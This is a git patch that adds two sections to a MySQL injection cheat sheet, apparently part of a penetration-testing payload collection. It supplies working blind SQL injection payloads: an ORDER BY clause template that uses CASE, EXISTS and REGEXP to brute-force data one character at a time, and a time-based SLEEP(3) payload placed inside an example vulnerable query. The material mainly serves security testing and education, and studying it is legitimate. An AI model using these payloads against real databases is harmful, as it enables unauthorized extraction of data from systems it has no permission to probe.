From 29fac0602398627d95e981053b53afe951351b87 Mon Sep 17 00:00:00 2001 From: chivato Date: Sun, 1 Mar 2020 21:15:19 +0000 Subject: [PATCH] From https://twitter.com/secgus MySQL Blind Queries and Data Exfiltration via the ORDER BY clause. --- SQL Injection/MySQL Injection.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 9dd034c..85d43eb 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -232,6 +232,29 @@ Works with `MySQL >= 5.1` ?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' ``` +### MySQL Blind SQL Injection in ORDER BY clause using a binary query and REGEXP + +This query basically orders by one column or the other, depending on whether the EXISTS() returns a 1 or not. +For the EXISTS() function to return a 1, the REGEXP query needs to match up, this means you can bruteforce blind values character by character and leak data from the database without direct output. + +``` +[...] ORDER BY (SELECT (CASE WHEN EXISTS(SELECT [COLUMN] FROM [TABLE] WHERE [COLUMN] REGEXP "^[BRUTEFORCE CHAR BY CHAR].*" AND [FURTHER OPTIONS / CONDITIONS]) THEN [ONE COLUMN TO ORDER BY] ELSE [ANOTHER COLUMN TO ORDER BY] END)); -- - +``` + +### MySQL Blind SQL Injection binary query using REGEXP. + +Payload: +``` +' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- - +``` + +Would work in the query (where the "where" clause is the injection point): +``` +SELECT name,price FROM items WHERE name = '' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -'; +``` + +In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item. + ### MYSQL Blind using a conditional statement TRUE: `if @@version starts with a 5`: